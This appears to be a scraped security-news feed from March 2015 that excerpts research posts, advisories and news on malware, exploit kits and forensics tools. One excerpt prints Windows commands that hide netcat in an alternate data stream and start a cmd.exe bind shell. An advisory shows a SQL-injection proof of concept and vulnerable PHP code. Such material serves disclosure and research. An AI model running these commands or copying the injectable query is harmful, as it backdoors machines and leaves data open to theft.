Imagine that after a nice, relaxing long weekend, you come in to work Monday morning at your job at the bank. While waking up with a cup of coffee, you begin checking email. Among the usual messages, there’s a message about a security update and you click it. Security updates are so common these days that it’s normal to get another email about one. What you don’t know is that your system has just been infected, starting off a long chain of events behind one of the biggest thefts in cyber history. - See more at: https://labs.opendns.com/2015/03/05/nlp-apt-dns/
↧
Utilizing NLP To Detect APT in DNS
↧
Autopsy 3.1.2 Digital Forensic Platform Released
Autopsy® is a digital forensics platform and graphical interface to The Sleuth Kit® and other digital forensics tools. It can be used by law enforcement, military, and corporate examiners to investigate what happened on a computer. You can even use it to recover photos from your camera's memory card.
more here...........http://sleuthkit.org/autopsy/
more here...........http://sleuthkit.org/autopsy/
↧
↧
Scripting Beacons and Deploying Persistence
One common Cobalt Strike feature request is an API to script the Beacon payload. Doing this right is a big project and it requires some architectural changes within Cobalt Strike. I’m working on it. I have a major development effort underway to reshape Beacon’s role in Cobalt Strike. Scripting is one piece of this.
Right now, some automation is possible. Last year, I put together an “emergency API” to deploy persistence through Beacon. My normal methods were causing Meterpreter to crash and I needed another option. This API isn’t supported and it isn’t permanent. It’s a stop-gap. In the mean time, it may help you.
more here......http://blog.cobaltstrike.com/2015/03/05/scripting-beacons-and-deploying-persistence/
Right now, some automation is possible. Last year, I put together an “emergency API” to deploy persistence through Beacon. My normal methods were causing Meterpreter to crash and I needed another option. This API isn’t supported and it isn’t permanent. It’s a stop-gap. In the mean time, it may help you.
more here......http://blog.cobaltstrike.com/2015/03/05/scripting-beacons-and-deploying-persistence/
↧
Why A Free Obfuscator Is Not Always Free
We all love our code but some of us love it so much that we don’t want anyone else to read or understand it. When you think about it, that’s understandable – hours and hours of hard dev work, days of testing and weeks (months?, years?) of fixing bugs and after all of this, someone steals, changes or modifies your hard work.
To address these concerns, many developers will obfuscate their code.
more here.........http://blog.sucuri.net/2015/03/why-a-free-obfuscator-is-not-always-free.html
To address these concerns, many developers will obfuscate their code.
more here.........http://blog.sucuri.net/2015/03/why-a-free-obfuscator-is-not-always-free.html
↧
XML: A New Vector For An Old Trick
October 2014 saw the beginning of an e-mail campaign spamming malicious Microsoft Office documents. Mostly Word documents using the “old” binary format, but sometimes Excel documents and sometimes the “new” ZIP/XML format. All with VBA macros that auto-execute when opened.
Yesterday, we started to see XML attachments.
more here.............https://isc.sans.edu/diary/XML%3A+A+New+Vector+For+An+Old+Trick/
Yesterday, we started to see XML attachments.
more here.............https://isc.sans.edu/diary/XML%3A+A+New+Vector+For+An+Old+Trick/
↧
↧
USING ALTERNATE DATA STREAMS TO PERSIST ON A COMPROMISED MACHINE
Back in the days before Windows Vista, Alternate Data Streams used to be an acceptable way for malware authors to hide their malicious code. An Alternate Data Stream can be used to hide the presence of secret or malicious files inside a legitimate file. By putting malware in an ADS, Windows will contain information for the legitimate file as well as the malicious file.
For example:
C:\>type C:\nc.exe > C:\windows\system32\calc.exe:svchost.exe
C:\>start /B C:\windows\system32\calc.exe:svchost.exe -d -L -p 2222 -e cmd.exe
The above commands will hide nc.exe in an Alternate Data Stream for calc.exe called svchost.exe and then start nc.exe from the ADS associated with calc.exe. Microsoft found this as an issue and removed the ability to run anything from ADS starting after Windows XP. In order to run your code that resides in an ADS, you would want to create a symlink using the mklink command. While this works, you have to have administrative rights on the machine in order to create the symlink. We all know users are not supposed to be running as an admin, so I tend to approach attack methods with the assumption that I will land on a box without admin rights.
Fortunately, I found a way to inject code into an Alternate Data Stream and execute it as a normal user.
more here.........https://enigma0x3.wordpress.com/2015/03/05/using-alternate-data-streams-to-persist-on-a-compromised-machine/
For example:
C:\>type C:\nc.exe > C:\windows\system32\calc.exe:svchost.exe
C:\>start /B C:\windows\system32\calc.exe:svchost.exe -d -L -p 2222 -e cmd.exe
The above commands will hide nc.exe in an Alternate Data Stream for calc.exe called svchost.exe and then start nc.exe from the ADS associated with calc.exe. Microsoft found this as an issue and removed the ability to run anything from ADS starting after Windows XP. In order to run your code that resides in an ADS, you would want to create a symlink using the mklink command. While this works, you have to have administrative rights on the machine in order to create the symlink. We all know users are not supposed to be running as an admin, so I tend to approach attack methods with the assumption that I will land on a box without admin rights.
Fortunately, I found a way to inject code into an Alternate Data Stream and execute it as a normal user.
more here.........https://enigma0x3.wordpress.com/2015/03/05/using-alternate-data-streams-to-persist-on-a-compromised-machine/
↧
ProjectSend r561 - SQL injection vulnerability
#Vulnerability title: ProjectSend r561 - SQL injection vulnerability
#Product: ProjectSend r561
#Vendor: http://www.projectsend.org/
#Affected version: ProjectSend r561
#Download link: http://www.projectsend.org/
#Fixed version: N/A
#Author: Le Ngoc Phi (phi.n.le@itas.vn) & ITAS Team (www.itas.vn)
::PROOF OF CONCEPT::
+ REQUEST:
GET /projectsend/users-edit.php?
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101
Firefox/35.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: 54f8105d859e0_SESSION=
PHPSESSID=
Connection: keep-alive
- Vulnerable file: client-edit.php
- Vulnerable parameter: id
- Vulnerable code:
if (isset($_GET['id'])) {
$client_id = mysql_real_escape_string($_
/**
* Check if the id corresponds to a real client.
* Return 1 if true, 2 if false.
**/
$page_status = (client_exists_id($client_id)) ? 1 : 2;
}
else {
/**
* Return 0 if the id is not set.
*/
$page_status = 0;
}
/**
* Get the clients information from the database to use on the form.
*/
if ($page_status === 1) {
$editing = $database->query("SELECT * FROM tbl_users WHERE
id=$client_id");
while($data = mysql_fetch_array($editing)) {
$add_client_data_name = $data['name'];
$add_client_data_user = $data['user'];
$add_client_data_email = $data['email'];
$add_client_data_addr = $data['address'];
$add_client_data_phone = $data['phone'];
$add_client_data_intcont = $data['contact'];
if ($data['notify'] == 1) { $add_client_data_notity = 1; }
else { $add_client_data_notity = 0; }
if ($data['active'] == 1) { $add_client_data_active = 1; }
else { $add_client_data_active = 0; }
}
}
::DISCLOSURE::
+ 01/06/2015: Detect vulnerability
+ 01/07/2015: Contact to vendor
+ 01/08/2015: Send the detail vulnerability to vendor - vendor did not reply
+ 03/05/2015: Public information
::REFERENCE::
-
http://www.itas.vn/news/itas-
-projectsend-r561-76.html
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS,
AND AT THE USER'S OWN RISK.
Best Regards,
------------------------------
ITAS Team (www.itas.vn)
#Product: ProjectSend r561
#Vendor: http://www.projectsend.org/
#Affected version: ProjectSend r561
#Download link: http://www.projectsend.org/
#Fixed version: N/A
#Author: Le Ngoc Phi (phi.n.le@itas.vn) & ITAS Team (www.itas.vn)
::PROOF OF CONCEPT::
+ REQUEST:
GET /projectsend/users-edit.php?
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101
Firefox/35.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: 54f8105d859e0_SESSION=
PHPSESSID=
Connection: keep-alive
- Vulnerable file: client-edit.php
- Vulnerable parameter: id
- Vulnerable code:
if (isset($_GET['id'])) {
$client_id = mysql_real_escape_string($_
/**
* Check if the id corresponds to a real client.
* Return 1 if true, 2 if false.
**/
$page_status = (client_exists_id($client_id)) ? 1 : 2;
}
else {
/**
* Return 0 if the id is not set.
*/
$page_status = 0;
}
/**
* Get the clients information from the database to use on the form.
*/
if ($page_status === 1) {
$editing = $database->query("SELECT * FROM tbl_users WHERE
id=$client_id");
while($data = mysql_fetch_array($editing)) {
$add_client_data_name = $data['name'];
$add_client_data_user = $data['user'];
$add_client_data_email = $data['email'];
$add_client_data_addr = $data['address'];
$add_client_data_phone = $data['phone'];
$add_client_data_intcont = $data['contact'];
if ($data['notify'] == 1) { $add_client_data_notity = 1; }
else { $add_client_data_notity = 0; }
if ($data['active'] == 1) { $add_client_data_active = 1; }
else { $add_client_data_active = 0; }
}
}
::DISCLOSURE::
+ 01/06/2015: Detect vulnerability
+ 01/07/2015: Contact to vendor
+ 01/08/2015: Send the detail vulnerability to vendor - vendor did not reply
+ 03/05/2015: Public information
::REFERENCE::
-
http://www.itas.vn/news/itas-
-projectsend-r561-76.html
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS,
AND AT THE USER'S OWN RISK.
Best Regards,
------------------------------
ITAS Team (www.itas.vn)
↧
Crackme: In Memory Bruteforce
The hardest crackme from the NVISO Cyber Security Challenge 2015 qualifications was a really interesting challenge and forced me to come up with a creative solution.
more here........http://haxelion.eu/writeup/Crackme_In_Memory_Bruteforce/
more here........http://haxelion.eu/writeup/Crackme_In_Memory_Bruteforce/
↧
Multiplatform Boleto Fraud Hits Users in Brazil
A study conducted around June last year revealed a malware-based fraud ring that infiltrated one of Brazil’s most popular payment methods – the Boleto Bancário, or simply the boleto. While the research and analysis was already published by RSA, we’ve recently discovered that this highly profitable fraud is still out in the wild and remains an effective way for cybercriminals for online banking theft in Brazil.
The boleto malware campaign had a reported potential loss of US$3.75 billion. The recent detections we found comprise malicious Mozilla Firefox and Google Chrome extensions cleverly installed in victims’ machines. Spammed messages with fake threats of debt that must be paid to governments are used to get users to install these extensions.
more here.........http://blog.trendmicro.com/trendlabs-security-intelligence/multiplatform-boleto-fraud-hits-users-in-brazil/
The boleto malware campaign had a reported potential loss of US$3.75 billion. The recent detections we found comprise malicious Mozilla Firefox and Google Chrome extensions cleverly installed in victims’ machines. Spammed messages with fake threats of debt that must be paid to governments are used to get users to install these extensions.
more here.........http://blog.trendmicro.com/trendlabs-security-intelligence/multiplatform-boleto-fraud-hits-users-in-brazil/
↧
↧
TLS-O-MATIC
Automated self-tests of TLS. Tests 1-15 are tests of certificate validation.
Test 20 is based on recommendations from bettercrypto.org on how to configure Apache HTTPD for a strong server. Test 21 is a test of weak crypto. An application that wants to claim to be secure today should not connect to a server configured like this.
more here...........https://github.com/edvinanet/tls-o-matic
Test 20 is based on recommendations from bettercrypto.org on how to configure Apache HTTPD for a strong server. Test 21 is a test of weak crypto. An application that wants to claim to be secure today should not connect to a server configured like this.
more here...........https://github.com/edvinanet/tls-o-matic
↧
Mining public keys with IVRE
In my previous post I explain how I have run a scan against Internet-exposed Modbus-enabled devices, and share the results obtained.
I have been asked several times why had I chosen to run a Zmap + Nmap scan instead of a Zmap + Zgrab, which would have been a lot faster.
Here is my answer: I wanted to scan the other services running on the Modbus-enabled devices, because:
They tells a lot about the device behind the IP address (the screenshots is a feature I really like, but anonymous FTP file listing is also great, for example)
They often show intersting weaknesses.
more here.........http://pierre.droids-corp.org/blog/html/2015/03/06/mining_public_keys_with_ivre.html
I have been asked several times why had I chosen to run a Zmap + Nmap scan instead of a Zmap + Zgrab, which would have been a lot faster.
Here is my answer: I wanted to scan the other services running on the Modbus-enabled devices, because:
They tells a lot about the device behind the IP address (the screenshots is a feature I really like, but anonymous FTP file listing is also great, for example)
They often show intersting weaknesses.
more here.........http://pierre.droids-corp.org/blog/html/2015/03/06/mining_public_keys_with_ivre.html
↧
Listen: Sound Of Botnets Helps Microsoft Fight Cybercrime
Last week Europol’s European Cybercrime Center led the takedown of a network of computers controlled by cybercriminals. Microsoft played an important role, taking legal action that led to the seizure of servers in four countries — servers that were the command and control centers for millions of infected computers worldwide.
These armies of infected computers are known as botnets. They’re computers infected with malware that turns the devices against their owners to steal banking credentials and crash websites. It’s been a silent problem. Until now.
more here........http://kuow.org/post/listen-sound-botnets-helps-microsoft-fight-cybercrime
These armies of infected computers are known as botnets. They’re computers infected with malware that turns the devices against their owners to steal banking credentials and crash websites. It’s been a silent problem. Until now.
more here........http://kuow.org/post/listen-sound-botnets-helps-microsoft-fight-cybercrime
↧
Dozens arrested in cybercrime 'strike week'
The UK's National Crime Agency has arrested 56 suspected hackers as part of a "strike week" against cybercrime.
In total, 25 separate operations were carried out across England, Scotland and Wales.
Those arrested are suspected of being involved in a wide variety of cybercrimes including data theft, fraud and virus writing.
One raid the BBC witnessed targeted a man suspected of involvement in a 2012 hack attack on web giant Yahoo.
more here..........http://www.bbc.com/news/technology-31753934
and video of one suspect.......https://www.youtube.com/watch?v=XH-uEriFIHA
In total, 25 separate operations were carried out across England, Scotland and Wales.
Those arrested are suspected of being involved in a wide variety of cybercrimes including data theft, fraud and virus writing.
One raid the BBC witnessed targeted a man suspected of involvement in a 2012 hack attack on web giant Yahoo.
more here..........http://www.bbc.com/news/technology-31753934
and video of one suspect.......https://www.youtube.com/watch?v=XH-uEriFIHA
↧
↧
autopwn- Specify targets and run sets of tools against them
autopwn is supposed to make a pentester's life easier by allowing them to specify tools they would like to run against targets, without having to type them all the time or write some dodgy script. This tool will also be useful during certain exams I suspect..
Core concepts of this project are:
Quickness - Specify targets and run pre-defined assessments against them
Easiness - Tool should be easy to use and write tool and assessment configurations for
Recon - This tool should be considered for recon purposes only. I wouldn't rely on this script to automatically identify and exploit issues (even though the tool name sort of implies such skiddy concepts)
more here.............https://github.com/nccgroup/autopwn
Core concepts of this project are:
Quickness - Specify targets and run pre-defined assessments against them
Easiness - Tool should be easy to use and write tool and assessment configurations for
Recon - This tool should be considered for recon purposes only. I wouldn't rely on this script to automatically identify and exploit issues (even though the tool name sort of implies such skiddy concepts)
more here.............https://github.com/nccgroup/autopwn
↧
Paper: Leaving our ZIP undone: how to abuse ZIP to deliver malware apps
Both Android and Java malware, delivered via ZIP-based packages, have reached high volumes in the wild, and continue to grow at a rapid rate. In his VB2014 paper, Gregory Panakkal explores the ZIP file format, focusing specifically on APK files as handled by the Android OS. He also explores new malformations that can be applied to APK files to break typical AV engine unarchiving, thus bypassing content scanning, while keeping the APK valid for the Android OS.
more here........https://www.virusbtn.com/virusbulletin/archive/2015/03/vb201503-ZIP
more here........https://www.virusbtn.com/virusbulletin/archive/2015/03/vb201503-ZIP
↧
Angler and the new threats
What I am writing is not a "news" anymore, but it is like a "consciousness raising" about the incredible job the guys behind Angler Exploit kit did.
But, let me start from the beginning. For everybody out there do not know what an Exploit Kit is I found out a clear and nice description from McAfee Labs:
An exploit kit is an off-the-shelf software package containing easy-to-use packaged attacks on known and unknown (zero-day) vulnerabilities. These toolkits exploit client-side vulnerabilities, typically targeting the web browser and applications that can be accessed by the web browser. Exploit kits can also track infection metrics and have robust control capabilities
Angler is one of several Exploit Kits available for attackers. Actually Angler Exploit Kit has become the most advanced, much more powerful and the best exploit kit available in the market so far, beating the infamous BlackHole exploit kit, with a host of exploits including zero-days and new techniques added to it.
What makes Angler so great are the following two characteristics: Domain Shadowing (”DSH“) and Filess Infection "Filess".
more here.........http://marcoramilli.blogspot.com/2015/03/angler-and-new-threats.html
But, let me start from the beginning. For everybody out there do not know what an Exploit Kit is I found out a clear and nice description from McAfee Labs:
An exploit kit is an off-the-shelf software package containing easy-to-use packaged attacks on known and unknown (zero-day) vulnerabilities. These toolkits exploit client-side vulnerabilities, typically targeting the web browser and applications that can be accessed by the web browser. Exploit kits can also track infection metrics and have robust control capabilities
Angler is one of several Exploit Kits available for attackers. Actually Angler Exploit Kit has become the most advanced, much more powerful and the best exploit kit available in the market so far, beating the infamous BlackHole exploit kit, with a host of exploits including zero-days and new techniques added to it.
What makes Angler so great are the following two characteristics: Domain Shadowing (”DSH“) and Filess Infection "Filess".
more here.........http://marcoramilli.blogspot.com/2015/03/angler-and-new-threats.html
↧
powercat
powercat
Netcat: The powershell version. (Powershell Version 2 and Later Supported)
Installation
powercat is a powershell function. First you need to load the function before you can execute it. You can put one of the below commands into your powershell profile so powercat is automatically loaded when powershell starts.
more here........https://github.com/besimorhino/powercat
Netcat: The powershell version. (Powershell Version 2 and Later Supported)
Installation
powercat is a powershell function. First you need to load the function before you can execute it. You can put one of the below commands into your powershell profile so powercat is automatically loaded when powershell starts.
more here........https://github.com/besimorhino/powercat
↧
↧
Skype worm reloaded
Skype worms are not exactly new anymore (unfortunately).
Scenario is simply: someone on your friends list got infected and is now sending you a link to a ‘funny image’ or pictures of you. In this case, you are being baited by a video of you. Let’s just hope it’s nothing embarrassing ;)
more here..........http://www.pandasecurity.com/mediacenter/malware/skype-worm-reloaded/
Scenario is simply: someone on your friends list got infected and is now sending you a link to a ‘funny image’ or pictures of you. In this case, you are being baited by a video of you. Let’s just hope it’s nothing embarrassing ;)
more here..........http://www.pandasecurity.com/mediacenter/malware/skype-worm-reloaded/
↧
uTorrent silently installing bundled Bitcoin mining software
BitTorrent client uTorrent has come under fire from users after it emerged the software’s latest update comes bundled with Bitcoin mining software.
The piece of software, named Epic Scale, is a Bitcoin miner that purports to use your ‘unused processing power to change the world.’
According to one user, the software is ‘easily noticeable by the increased CPU load when the computer is idle.’
Unfortunately, the problem lies in the fact that users say they weren’t asked they wanted the software to be installed.
Read more at http://www.trustedreviews.com/news/utorrent-silently-installing-bundled-bitcoin-mining-software#7gMzDzfWV9GwZxti.99
The piece of software, named Epic Scale, is a Bitcoin miner that purports to use your ‘unused processing power to change the world.’
According to one user, the software is ‘easily noticeable by the increased CPU load when the computer is idle.’
Unfortunately, the problem lies in the fact that users say they weren’t asked they wanted the software to be installed.
Read more at http://www.trustedreviews.com/news/utorrent-silently-installing-bundled-bitcoin-mining-software#7gMzDzfWV9GwZxti.99
↧
TLS in HTTP/2
I’ve written the http2 explained document and I’ve done several talks about HTTP/2. I’ve gotten a lot of questions about TLS in association with HTTP/2 due to this, and I want to address some of them here.......http://daniel.haxx.se/blog/
↧